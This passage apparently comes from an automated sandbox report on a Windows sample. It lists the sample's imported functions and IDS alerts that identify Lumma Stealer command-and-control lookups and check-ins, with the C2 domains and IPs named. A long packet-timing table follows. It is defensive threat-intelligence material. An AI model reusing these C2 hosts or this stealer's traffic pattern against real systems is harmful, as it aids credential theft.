                                                                                                                                                                                                                                      KERNEL32.dllGetComputerNameA, EnumCalendarInfoA, WriteConsoleInputW, TlsGetValue, SetComputerNameExA, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, InterlockedCompareExchange, WriteConsoleInputA, FreeEnvironmentStringsA, GetModuleHandleW, FindNextVolumeMountPointA, CancelDeviceWakeupRequest, EnumTimeFormatsA, LoadLibraryW, ReadConsoleInputA, GetCalendarInfoW, GetVersionExW, GetFileAttributesA, FindNextVolumeW, GetShortPathNameA, VerifyVersionInfoW, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, CreateJobSet, CopyFileA, SetFileAttributesA, GetTempFileNameA, GetAtomNameA, LoadLibraryA, InterlockedExchangeAdd, SetCalendarInfoW, OpenEventA, GetCommMask, EnumDateFormatsA, GlobalUnWire, GetDiskFreeSpaceExW, EnumCalendarInfoExA, LCMapStringW, GetVolumeInformationW, InterlockedIncrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, HeapAlloc, HeapCreate, VirtualFree, HeapReAlloc, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, ReadFile, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, SetFilePointer, CloseHandle, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetLocaleInfoW, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                      TamilIndia
                                                                                                                                                                                                                                      TamilSri Lanka
                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                      2024-12-17T08:18:42.268418+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704104.21.56.70443TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:43.839039+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705176.113.115.1980TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:48.082321+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.5619161.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-17T08:18:48.315792+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.5634781.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-17T08:18:49.777440+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.549706104.131.68.180443TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:49.777440+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.131.68.180443TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:49.781276+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)1104.131.68.180443192.168.2.549706TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:50.284154+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549706104.131.68.180443TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:50.284154+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706104.131.68.180443TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:50.289403+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.5497021.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-17T08:18:52.338976+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.54970845.77.249.79443TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:52.338976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970845.77.249.79443TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:52.350433+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)145.77.249.79443192.168.2.549708TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:53.290018+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.54970845.77.249.79443TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:53.290018+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.54970845.77.249.79443TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:53.291662+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.5517811.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-17T08:18:53.516770+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.5609571.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-17T08:18:53.742917+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.5514541.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-17T08:18:54.053892+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.5620731.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-17T08:18:54.274547+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.5557251.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-17T08:18:54.498503+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.5652261.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-17T08:18:56.178703+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715104.121.10.34443TCP
                                                                                                                                                                                                                                      2024-12-17T08:18:56.932913+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549715104.121.10.34443TCP
                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:40.398171902 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:40.398221970 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:40.398339033 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:40.407941103 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:40.407973051 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:41.632982016 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:41.633152962 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:41.690980911 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:41.691016912 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:41.692040920 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:41.692122936 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:41.694613934 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:41.739334106 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.268513918 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.268649101 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.268678904 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.268731117 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.268738031 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.268785000 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.268806934 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.268845081 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.271369934 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.271394014 CET44349704104.21.56.70192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.271408081 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.271450996 CET49704443192.168.2.5104.21.56.70
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.392240047 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.512226105 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.512346983 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.512564898 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.632345915 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.838874102 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.838948965 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839030027 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839039087 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839039087 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839088917 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839153051 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839165926 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839200020 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839215040 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839231014 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839241982 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839261055 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839267969 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839272022 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839282990 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839288950 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839332104 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839371920 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.959095001 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.959184885 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.959273100 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.959273100 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.963133097 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.963188887 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.963198900 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.963232994 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.031382084 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.031399965 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.031536102 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.035422087 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.035485029 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.036808968 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.036859035 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.036891937 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.036931038 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.045285940 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.045300007 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.045361042 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.053689003 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.053751945 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.053872108 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.053920031 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.062063932 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.062125921 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.062185049 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.062230110 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.070482016 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.070549965 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.070584059 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.070625067 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.078958988 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.078985929 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.079070091 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.079102039 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.087384939 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.087399006 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.087469101 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.095792055 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.095855951 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.095871925 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.095922947 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.103399992 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.103477955 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.103662968 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.103705883 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.110825062 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.110889912 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.110899925 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.110945940 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.151472092 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.151499033 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.151550055 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.151571035 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.223309040 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.223354101 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.223395109 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.223423004 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.225490093 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.225555897 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.225629091 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.225677967 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.229937077 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.230021000 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.231563091 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.231626034 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.231661081 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.231723070 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.236130953 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.236181974 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.236202002 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.236229897 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.240585089 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.240643978 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.240669012 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.240710974 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.245088100 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.245141983 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.245354891 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.245413065 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.249696970 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.249710083 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.249752998 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.249769926 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.254024982 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.254075050 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.254149914 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.254194021 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.258522987 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.258574009 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.258622885 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.258667946 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.263025999 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.263087034 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.263123035 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.263175964 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.267554045 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.267606020 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.267649889 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.267688990 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.272047997 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.272119999 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.272159100 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.272201061 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.276549101 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.276607990 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.276652098 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.276695013 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.281136990 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.281208038 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.281275034 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.281316996 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.284950972 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.285012007 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.285090923 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.285137892 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.288573027 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.288592100 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.288623095 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.288646936 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.292205095 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.292262077 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.292341948 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.292382002 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.295965910 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.296020985 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.296031952 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.296066999 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.299621105 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.299685001 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.299689054 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.299726009 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.303374052 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.303386927 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.303487062 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.303487062 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.306900024 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.306951046 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.306979895 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.307020903 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.310539007 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.310600042 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.310687065 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.310745955 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.314188957 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.314244032 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.415386915 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.415456057 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.415524006 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.415574074 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.416910887 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.416964054 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.416990995 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.417026997 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.419770956 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.419831038 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.419863939 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.419908047 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.422913074 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.422926903 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:44.422976971 CET4970580192.168.2.5176.113.115.19
